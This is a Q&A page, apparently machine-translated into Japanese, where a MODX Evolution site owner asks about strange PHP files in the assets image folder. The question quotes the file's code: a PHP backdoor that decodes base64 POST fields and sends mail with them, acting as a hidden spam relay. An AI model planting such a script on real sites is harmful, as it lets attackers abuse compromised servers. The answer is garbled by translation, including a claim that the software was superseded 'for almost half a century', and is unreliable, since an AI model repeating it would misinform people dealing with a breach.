MODX evo - これらのバグはアセット画像フォルダにありますか？

Question

は私のMODxの資産に奇妙なPHPファイルがあります - 私はそれらを開くと、コードは画像に関連していないようです>画像

cklxt.php.php.php.php 
cklxt.php.php.php.php.php 

：

<?php 
$ixhpq = stripslashes(base64_decode($_POST['gqujwdb'])); 
$xuoh = stripslashes(base64_decode($_POST['maih'])); 
$iglrhrluhvqgr = stripslashes(base64_decode($_POST['mepouebon'])); 
$yflalhugo = stripslashes(base64_decode($_POST['cdcftxzkyrg'])); 
$nzcbxor = mail(stripslashes($ixhpq), stripslashes($xuoh), stripslashes($iglrhrluhvqgr), stripslashes($yflalhugo)); 
if($nzcbxor){echo 'nlewxnrsdqxow';} else {echo 'qhguq : ' . $nzcbxor;} 

が多くあります。もっと...

これらのPHPファイルはそこにありますか？それともバグですか、サイトがハッキングされていますか？

Answer 1

Evolution CMSは、もはやMODXによって公式にサポートされていません。 11月には一連の悪質なハッキングがあり、コードベースを担当するコミュニティは対応が遅かった。最終的にパッチがリリースされましたが、それに伴って何百ものコードが変更されました。これらのハッキングを防止するための一時的な解決策はたくさんありますが、進化のデベロッパーに相談してサイトを正常に戻すことができます。

私はアプリケーションに責任を負いません。これは11歳以上で、約12のCVEしか持っていないためです。それはちょうど時代遅れで、パッチが取られておらず、ほぼ半世紀にわたって革命に取って代わられています。